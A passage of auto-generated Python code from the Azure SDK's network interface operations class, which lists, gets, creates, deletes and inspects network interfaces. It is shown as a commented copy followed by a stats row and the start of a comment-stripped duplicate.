# type: (...) -> Iterable["models.NetworkInterfaceListResult"]
"""Gets all network interfaces in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2016_09_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_virtual_machine_scale_set_network_interfaces.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/networkInterfaces'} # type: ignore
def get_virtual_machine_scale_set_network_interface(
self,
resource_group_name, # type: str
virtual_machine_scale_set_name, # type: str
virtualmachine_index, # type: str
network_interface_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.NetworkInterface"
"""Get the specified network interface in a virtual machine scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_machine_scale_set_name: The name of the virtual machine scale set.
:type virtual_machine_scale_set_name: str
:param virtualmachine_index: The virtual machine index.
:type virtualmachine_index: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2016_09_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
# Construct URL
url = self.get_virtual_machine_scale_set_network_interface.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_virtual_machine_scale_set_network_interface.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces/{networkInterfaceName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def begin_delete(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Deletes the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
network_interface_name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "models.NetworkInterface"
"""Gets information about the specified network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NetworkInterface, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2016_09_01.models.NetworkInterface
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
network_interface_name, # type: str
parameters, # type: "models.NetworkInterface"
**kwargs # type: Any
):
# type: (...) -> "models.NetworkInterface"
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json, text/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'NetworkInterface')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def begin_create_or_update(
self,
resource_group_name, # type: str
network_interface_name, # type: str
parameters, # type: "models.NetworkInterface"
**kwargs # type: Any
):
# type: (...) -> LROPoller["models.NetworkInterface"]
"""Creates or updates a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:param parameters: Parameters supplied to the create or update network interface operation.
:type parameters: ~azure.mgmt.network.v2016_09_01.models.NetworkInterface
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either NetworkInterface or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2016_09_01.models.NetworkInterface]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterface"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('NetworkInterface', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}'} # type: ignore
def list_all(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceListResult"]
"""Gets all network interfaces in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2016_09_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_all.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/networkInterfaces'} # type: ignore
def list(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.NetworkInterfaceListResult"]
"""Gets all network interfaces in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either NetworkInterfaceListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2016_09_01.models.NetworkInterfaceListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.NetworkInterfaceListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces'} # type: ignore
def _get_effective_route_table_initial(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Optional["models.EffectiveRouteListResult"]
cls = kwargs.pop('cls', None) # type: ClsType[Optional["models.EffectiveRouteListResult"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
# Construct URL
url = self._get_effective_route_table_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_get_effective_route_table_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'} # type: ignore
def begin_get_effective_route_table(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller["models.EffectiveRouteListResult"]
"""Gets all route tables applied to a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either EffectiveRouteListResult or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2016_09_01.models.EffectiveRouteListResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.EffectiveRouteListResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._get_effective_route_table_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveRouteListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_get_effective_route_table.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveRouteTable'} # type: ignore
def _list_effective_network_security_groups_initial(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Optional["models.EffectiveNetworkSecurityGroupListResult"]
cls = kwargs.pop('cls', None) # type: ClsType[Optional["models.EffectiveNetworkSecurityGroupListResult"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
# Construct URL
url = self._list_effective_network_security_groups_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'networkInterfaceName': self._serialize.url("network_interface_name", network_interface_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_list_effective_network_security_groups_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'} # type: ignore
def begin_list_effective_network_security_groups(
self,
resource_group_name, # type: str
network_interface_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller["models.EffectiveNetworkSecurityGroupListResult"]
"""Gets all network security groups applied to a network interface.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param network_interface_name: The name of the network interface.
:type network_interface_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either EffectiveNetworkSecurityGroupListResult or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2016_09_01.models.EffectiveNetworkSecurityGroupListResult]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.EffectiveNetworkSecurityGroupListResult"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._list_effective_network_security_groups_initial(
resource_group_name=resource_group_name,
network_interface_name=network_interface_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('EffectiveNetworkSecurityGroupListResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_list_effective_network_security_groups.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/networkInterfaces/{networkInterfaceName}/effectiveNetworkSecurityGroups'} # type: ignore
| 50.212284 | 316 | 0.668326 |
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models
if TYPE_CHECKING:
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class NetworkInterfacesOperations(object):
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list_virtual_machine_scale_set_vm_network_interfaces(
self,
resource_group_name,
virtual_machine_scale_set_name,
virtualmachine_index,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
def prepare_request(next_link=None):
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
url = self.list_virtual_machine_scale_set_vm_network_interfaces.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualMachineScaleSetName': self._serialize.url("virtual_machine_scale_set_name", virtual_machine_scale_set_name, 'str'),
'virtualmachineIndex': self._serialize.url("virtualmachine_index", virtualmachine_index, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {}
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('NetworkInterfaceListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_virtual_machine_scale_set_vm_network_interfaces.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.Compute/virtualMachineScaleSets/{virtualMachineScaleSetName}/virtualMachines/{virtualmachineIndex}/networkInterfaces'}
def list_virtual_machine_scale_set_network_interfaces(
self,
resource_group_name,
virtual_machine_scale_set_name,
**kwargs
):
cls = kwargs.pop('cls', None)
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2016-09-01"
accept = "application/json, text/json"
def prepare_request(next_link=None):
header_parameters = {}
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
url = self.list_virtual_machine_scale_set_network_interfaces.metadata['url']
path_format_arguments = {
